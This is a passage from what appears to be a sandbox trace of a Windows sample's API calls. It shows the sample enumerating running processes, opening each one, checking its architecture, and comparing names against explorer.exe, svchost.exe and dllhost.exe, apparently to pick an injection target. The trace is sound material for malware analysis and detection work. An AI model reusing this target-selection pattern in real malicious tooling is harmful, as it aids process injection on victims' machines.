out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0179.942] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0179.942] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0179.942] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0179.942] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0179.943] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0179.943] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0179.943] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0179.943] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0179.944] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0179.944] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0179.944] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0179.944] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0179.945] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0179.945] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0179.945] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0179.945] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0179.946] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0179.946] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0179.946] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0179.946] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0179.947] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0179.947] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0179.947] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0179.947] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0179.948] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0179.948] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0179.948] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0179.948] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0179.949] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0179.949] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0179.949] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0179.949] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0179.950] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0179.950] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0179.950] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0179.950] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0179.951] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0xd8 [0179.951] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0179.951] CloseHandle (hObject=0xd8) returned 1 [0179.951] lstrcmpiA (lpString1="dwm.exe", lpString2="explorer.exe") returned -1 [0179.951] lstrcmpiA (lpString1="dwm.exe", lpString2="svchost.exe") returned -1 [0179.951] lstrcmpiA (lpString1="dwm.exe", lpString2="dllhost.exe") returned 1 [0179.951] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0179.951] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0179.952] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0179.952] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4ac) returned 0xd8 [0179.952] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0179.952] CloseHandle (hObject=0xd8) returned 1 [0179.952] lstrcmpiA (lpString1="taskhost.exe", lpString2="explorer.exe") returned 1 [0179.952] lstrcmpiA (lpString1="taskhost.exe", lpString2="svchost.exe") returned 1 [0179.952] lstrcmpiA (lpString1="taskhost.exe", lpString2="dllhost.exe") returned 1 [0179.952] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0179.953] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0179.953] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0179.953] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x0 [0179.953] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0179.954] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xd8 [0179.954] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0179.954] CloseHandle (hObject=0xd8) returned 1 [0179.954] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0179.954] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x62c) returned 0xd8 [0179.954] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0179.954] CloseHandle (hObject=0xd8) returned 1 [0179.954] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0179.955] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a4) returned 0xd8 [0179.955] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0179.955] CloseHandle (hObject=0xd8) returned 1 [0179.955] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0179.956] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xd8 [0179.956] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0179.956] CloseHandle (hObject=0xd8) returned 1 [0179.956] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0179.956] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0xd8 [0179.956] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0179.956] CloseHandle (hObject=0xd8) returned 1 [0179.956] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0179.957] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xd8 [0179.957] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0179.957] CloseHandle (hObject=0xd8) returned 1 [0179.957] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0179.957] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xd8 [0179.957] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0179.957] CloseHandle (hObject=0xd8) returned 1 [0179.957] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0179.958] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0xd8 [0179.958] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0179.958] CloseHandle (hObject=0xd8) returned 1 [0179.958] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0179.959] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xd8 [0179.959] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0179.959] CloseHandle (hObject=0xd8) returned 1 [0179.959] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0179.959] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xd8 [0179.959] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0179.959] CloseHandle (hObject=0xd8) returned 1 [0179.959] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0179.960] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xd8 [0179.960] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0179.960] CloseHandle (hObject=0xd8) returned 1 [0179.960] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0179.960] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f0) returned 0xd8 [0179.960] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0179.960] CloseHandle (hObject=0xd8) returned 1 [0179.960] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0179.961] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d4) returned 0xd8 [0179.961] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0179.961] CloseHandle (hObject=0xd8) returned 1 [0179.961] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0179.961] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x58c) returned 0xd8 [0179.961] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0179.962] CloseHandle (hObject=0xd8) returned 1 [0179.962] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0179.962] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0xd8 [0179.962] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0179.962] CloseHandle (hObject=0xd8) returned 1 [0179.962] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0179.963] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xd8 [0179.963] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0179.963] CloseHandle (hObject=0xd8) returned 1 [0179.963] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0179.963] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d8) returned 0xd8 [0179.963] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0179.963] CloseHandle (hObject=0xd8) returned 1 [0179.963] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0179.964] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0xd8 [0179.964] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0179.964] CloseHandle (hObject=0xd8) returned 1 [0179.964] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0179.964] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0xd8 [0179.964] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0179.964] CloseHandle (hObject=0xd8) returned 1 [0179.965] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0179.965] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xd8 [0179.965] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0179.965] CloseHandle (hObject=0xd8) returned 1 [0179.965] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0179.966] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0xd8 [0179.966] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0179.966] CloseHandle (hObject=0xd8) returned 1 [0179.966] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0179.966] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x0 [0179.966] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0179.967] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0179.967] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0179.967] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0179.967] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0179.968] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa70) returned 0x0 [0179.968] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0179.968] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb00) returned 0x0 [0179.968] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0179.969] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb84) returned 0x0 [0179.969] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0179.969] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbdc) returned 0xd8 [0179.969] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0179.969] CloseHandle (hObject=0xd8) returned 1 [0179.969] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0179.969] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0179.970] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x790) returned 0xd8 [0179.970] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0179.970] CloseHandle (hObject=0xd8) returned 1 [0179.970] lstrcmpiA (lpString1="taskeng.exe", lpString2="explorer.exe") returned 1 [0179.970] lstrcmpiA (lpString1="taskeng.exe", lpString2="svchost.exe") returned 1 [0179.970] lstrcmpiA (lpString1="taskeng.exe", lpString2="dllhost.exe") returned 1 [0179.970] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0179.971] OpenProcess 